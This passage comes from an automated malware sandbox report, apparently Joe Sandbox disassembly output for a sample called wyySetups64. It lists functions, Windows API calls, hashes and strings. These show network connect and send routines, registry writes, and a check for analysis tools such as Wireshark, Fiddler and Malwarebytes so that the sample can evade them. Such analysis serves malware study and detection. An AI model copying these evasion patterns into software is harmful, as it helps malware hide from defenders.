                                                                                                                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1692523546-0
                                                                                                                                                                                                              • Opcode ID: d25fdeeaf1e3ade76fafefa28543cafb80772b42cdb684446567188d831f434b
                                                                                                                                                                                                              • Instruction ID: 232d7c0b49e7a4e344f8e88ab3cce64caa8ad4041ec374f5581e60619bf390eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d25fdeeaf1e3ade76fafefa28543cafb80772b42cdb684446567188d831f434b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE91BB75600A1AEBC734DF26D8C8AAAF7A9FF44701F048519E516CBA44C73AF891CBD0
                                                                                                                                                                                                              Function 0337A6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$swprintf$_malloc
                                                                                                                                                                                                              • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                                                                                                              • API String ID: 1873853019-591889663
                                                                                                                                                                                                              • Opcode ID: 32c45da956c4331a72ece556fcb49aabef0ab91a95a7f34aa22dbab0efd0f22d
                                                                                                                                                                                                              • Instruction ID: c5322e4ce9bda48ce49fcf1b0fe337aa32855a42e9972fa7cfc258826fa3785a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32c45da956c4331a72ece556fcb49aabef0ab91a95a7f34aa22dbab0efd0f22d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB81C1B9E40304ABEB20EB24DCC6F6B77A4AF45710F0841A5FD185F382E675E95187E2
                                                                                                                                                                                                              Function 03375CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 03375CD3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: VisibleWindow
                                                                                                                                                                                                              • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                                                                                                              • API String ID: 1208467747-3439171801
                                                                                                                                                                                                              • Opcode ID: 76018dff8240c20d00c6e15db23fa01155d41fdeb6a42deb21bb2cd4d7f35201
                                                                                                                                                                                                              • Instruction ID: 5f5f3f0b16c01c5b0087bd2a35a48aca63a7942d663840edd6b8e3e582b1f76d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76018dff8240c20d00c6e15db23fa01155d41fdeb6a42deb21bb2cd4d7f35201
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A74161A6E51B11BAFE7AF6316DC2FEF214C0D2358AF080066EC58EC515F64D935980EE
                                                                                                                                                                                                              Function 00BD4530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BD455A
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD457B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD459B
                                                                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00BD45BD
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00BD45D7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD4620
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BD4644
                                                                                                                                                                                                              • send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD4668
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD4686
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD4691
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00BD469F
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 00BD46B3
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00BD46BD
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 00BD46F6
                                                                                                                                                                                                              • SetLastError.KERNEL32(000005B4), ref: 00BD470A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BEFA44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3448239111-0
                                                                                                                                                                                                              • Opcode ID: fe1065ad166a2c7e744d0c7783a49c6b59afd02074ffd271cf3812bf2d7238ea
                                                                                                                                                                                                              • Instruction ID: a7cbf9291dae1b2ef11d1bd64a84cf9a397773f311e88c2172d2094b5fb96f9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe1065ad166a2c7e744d0c7783a49c6b59afd02074ffd271cf3812bf2d7238ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C51AD71600A52ABC724DF64D8C8BA9F7A5FF15709F1041A6F5068BB90EB70E890CBD0
                                                                                                                                                                                                              Function 0337DA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0337A8C1,?,?), ref: 0337DA43
                                                                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0337A8C1,?,?), ref: 0337DA62
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                              • Opcode ID: 02c5cd16a2f0afb77a7d3c9b484728ca4d5cd0d4ae053c3036a395f9eadef436
                                                                                                                                                                                                              • Instruction ID: 4e381ed643d164ef3ea292bd3d39e27a0d2b7b400d51734bc99b6258c6529d65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02c5cd16a2f0afb77a7d3c9b484728ca4d5cd0d4ae053c3036a395f9eadef436
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A581EF76700605ABD770DFA9ECC4B6AB7E8FF48315F084569E94ADBA40E779E400CB90
                                                                                                                                                                                                              Function 0337C5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337C63D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337C64C
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0337C66F
                                                                                                                                                                                                                • Part of subcall function 0337C81E: RegCloseKey.ADVAPI32(80000000,0337C7FA), ref: 0337C82B
                                                                                                                                                                                                                • Part of subcall function 0337C81E: RegCloseKey.ADVAPI32(00000000), ref: 0337C834
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close_memset$Open
                                                                                                                                                                                                              • String ID: %08X
                                                                                                                                                                                                              • API String ID: 4292648718-3773563069
                                                                                                                                                                                                              • Opcode ID: e68c0de60d040e00c03c84e9f4767ffcb68e2522725247238b18a60adaf2bb81
                                                                                                                                                                                                              • Instruction ID: 8a48db90e178165e46bbae1608efc1c7f7839a0b347c4f721629e02f3c40c7de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e68c0de60d040e00c03c84e9f4767ffcb68e2522725247238b18a60adaf2bb81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D512FB2A40218AFDB24EF50DCC5FEA777CEB44704F405599F609AA180DB75AB44CB94
                                                                                                                                                                                                              Function 00BD36F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 00BD3710
                                                                                                                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00BD3749
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 00BD3766
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00BD3779
                                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 00BD377B
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00BED990), ref: 00BD378D
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,00BED990), ref: 00BD3799
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,00BED990), ref: 00BD37B8
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00BED990), ref: 00BD37C4
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00BD37D2
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 00BD37F8
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 00BD3816
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 00BD382B
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00BED990), ref: 00BD383A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1455939504-0
                                                                                                                                                                                                              • Opcode ID: 67771390a772ba2efa1cc25f5b9cd83f73a28ca6cdeae8edb8ba92efb2f91cfe
                                                                                                                                                                                                              • Instruction ID: f100c5865cb4e1be0470951a14e8e4c230c59dd3e33e83c9e908f3655a0c0c21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67771390a772ba2efa1cc25f5b9cd83f73a28ca6cdeae8edb8ba92efb2f91cfe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E419EB1A00244ABE720DFA4DC89F7FB7B8EF48B14F104519FA11AB2D1DA75A900CB61
                                                                                                                                                                                                              Function 033736F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 03373710
                                                                                                                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03373749
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03373766
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03373779
                                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 0337377B
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,033A1F0C), ref: 0337378D
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,033A1F0C), ref: 03373799
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,033A1F0C), ref: 033737B8
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,033A1F0C), ref: 033737C4
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 033737D2
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 033737F8
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 03373816
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 0337382B
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,033A1F0C), ref: 0337383A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1455939504-0
                                                                                                                                                                                                              • Opcode ID: 71adb8c30414c19efd63397406e6b8c8da8f43c09913640908f8c20d1b1e8b23
                                                                                                                                                                                                              • Instruction ID: 48f70d403df5bf6f063f32e8d8c634f3cc7da661d15d811039715f22672a6891
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71adb8c30414c19efd63397406e6b8c8da8f43c09913640908f8c20d1b1e8b23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D415E75A00609BBEB24EBA4DCC9FBBB7BCFB48710F104619F615DA2C0C675A904DB61
                                                                                                                                                                                                              Function 0337AA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,7AA29978), ref: 0337AA58
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337AA8F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337AAA7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337AABA
                                                                                                                                                                                                                • Part of subcall function 03378020: lstrlenW.KERNEL32(?), ref: 03378038
                                                                                                                                                                                                                • Part of subcall function 03378020: _memset.LIBCMT ref: 03378042
                                                                                                                                                                                                                • Part of subcall function 03378020: lstrlenW.KERNEL32(?), ref: 0337804B
                                                                                                                                                                                                                • Part of subcall function 03378020: lstrlenW.KERNEL32(?), ref: 03378056
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0337ABBE
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0337AC6E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337ACAA
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                                • Part of subcall function 03379730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7AA29978,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E,00000000), ref: 03379773
                                                                                                                                                                                                                • Part of subcall function 03379730: InitializeCriticalSectionAndSpinCount.KERNEL32(0337E1AE,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379812
                                                                                                                                                                                                                • Part of subcall function 03379730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379850
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                                                                                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                                                                                                              • API String ID: 1254190970-1225219777
                                                                                                                                                                                                              • Opcode ID: ccea4f2daccc00ac2e6e5282f4a4633470c562c9f5e48f6508c2c11a760d9cad
                                                                                                                                                                                                              • Instruction ID: c3f39cec53927356e8c79222f374a199dc2cc4d1eef601c233714a3d02bb8412
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccea4f2daccc00ac2e6e5282f4a4633470c562c9f5e48f6508c2c11a760d9cad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC617EB1918344EBD770EF64C8C5AAFB3E9BB89714F004A1DF19987240E7399544CBA2
                                                                                                                                                                                                              Function 0337C860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0337C889
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?), ref: 0337C894
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337C8A4
                                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0337C8C3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0337C8D1
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0337C8E4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0337C8F2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337C900
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                                                                                                              • String ID: AppEvents$Network
                                                                                                                                                                                                              • API String ID: 3935456190-3733486940
                                                                                                                                                                                                              • Opcode ID: b11999438c5b1298fb57303903516c4de5a09890ad3ff0599b59a549531cb24d
                                                                                                                                                                                                              • Instruction ID: 6938de6e68c933cee0c75d1dcfe720b3c5fc9ea52591a3decb21e07d79602c63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b11999438c5b1298fb57303903516c4de5a09890ad3ff0599b59a549531cb24d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A114F75A01208FBFB24EBA5DCC9FABB36CEB09711F10454AFA01D7240D676AE40D7A4
                                                                                                                                                                                                              Function 031FA0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$swprintf$_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1873853019-0
                                                                                                                                                                                                              • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                                                              • Instruction ID: e095a36fdf76ff31fee0e724a3eebe3995ca676dede5d3e5ba81fee92a989b12
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9881D7B9940300AFE710EB54EC85F6B77A4EF48710F184164EE095F383EB71E955CAA6
                                                                                                                                                                                                              Function 00BD5A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,6B68DABD), ref: 00BD5A65
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00BD5B04
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5B42
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5B67
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00BD5C5F
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00BD5C80
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5B8C
                                                                                                                                                                                                                • Part of subcall function 00BD1280: __CxxThrowException@8.LIBCMT ref: 00BD1290
                                                                                                                                                                                                                • Part of subcall function 00BD1280: DeleteCriticalSection.KERNEL32(00000000,?,00BE7E78), ref: 00BD12A1
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD5CF1
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD5CF7
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00BD5D0B
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5D14
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1400036169-0
                                                                                                                                                                                                              • Opcode ID: 3d36b6caafa3bfaf6cd96c2db17d9b1583bd00cfcf53a95359c628f82e75602b
                                                                                                                                                                                                              • Instruction ID: 03cce25f0b7aab9ac019dd8b6ac957d83a0c275407ec28b29924623c45235764
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d36b6caafa3bfaf6cd96c2db17d9b1583bd00cfcf53a95359c628f82e75602b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0A1F4B0A01A46AFD354DF6AC88479AFBE8FF08304F50466EE12DD7640DB74A964CF90
                                                                                                                                                                                                              Function 00BD4C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,6B68DABD,?,?,?,?,00000000,000000FF,00000000), ref: 00BD4CC6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,6B68DABD,?,?,?,?,00000000,000000FF,00000000), ref: 00BD4CED
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 00BD4D01
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 00BD4D08
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2124651672-0
